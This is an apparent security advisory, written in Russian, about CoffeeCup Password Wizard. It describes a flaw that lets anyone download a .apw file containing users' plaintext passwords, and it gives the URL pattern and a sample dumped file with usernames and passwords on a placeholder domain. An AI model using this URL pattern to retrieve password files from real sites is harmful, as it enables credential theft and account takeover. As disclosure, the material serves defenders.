Раскрытие паролей в CoffeeCup Password Wizard

Удаленный пользователь может удаленно получить доступ к файлу паролей, в котором содержится пароли пользователей в открытом виде и другая чувствительная информация. Пример:

https://[target]/billing/billing.a pw

--------- billing.apw -----------

COFFEECUP PASSWORD WIZARD FILE
WWW.COFFEECUP.COM
PLEASE DO NOT EDIT!!!!

MOVIE WIDTH:120
MOVIE HEIGHT:100
MOVIE FRAME RATE:0
MOVIE BK COLOR:$00ECECEC
MOVIE DEFAULT URL:
MOVIE DEFAULT FRAME:
MOVIE SWF NAME:billing.swf
MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis
Webs\victim.com\new website project\billing\
MOVIE FONT NAME:MS Sans Serif
MOVIE FONT SIZE:8
MOVIE FONT COLOR:clBlack
MOVIE TRANSPARENT TRUE
MOVIE VERTICAL TRUE

USER BOX LEFT:2
USER BOX TOP:1
USER BOX WIDTH:116
USER BOX HEIGHT:34
USER BOX CAPTION:Username

PASS BOX LEFT:2
PASS BOX TOP:36
PASS BOX WIDTH:116
PASS BOX HEIGHT:34
PASS BOX CAPTION:Password

BUTTON LEFT:15
BUTTON TOP:78
BUTTON WIDTH:90
BUTTON HEIGHT:20
BUTTON PATH:
BUTTON TX:1
BUTTON TY:1

ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm 
ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm 
[...]
END

--------- billing.apw -----------

Example of user & pass on billing:

user: anyweb
pass: xnet0305
url option panel: https://www.victim.com/billing/anyweb0001.htm


----------------------------------------------------------------

[EOF]

-----------------------------------------------
Credits: ToOcOoL (http://www.valenciahack.com/)
-----------------------------------------------

--------------------------------
Note: sorry by my bad english ;)
--------------------------------

-- 
XyBØrG
WebMaster de:
www.RZWEB.com.ar
Powered By Dattatec.Com

+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!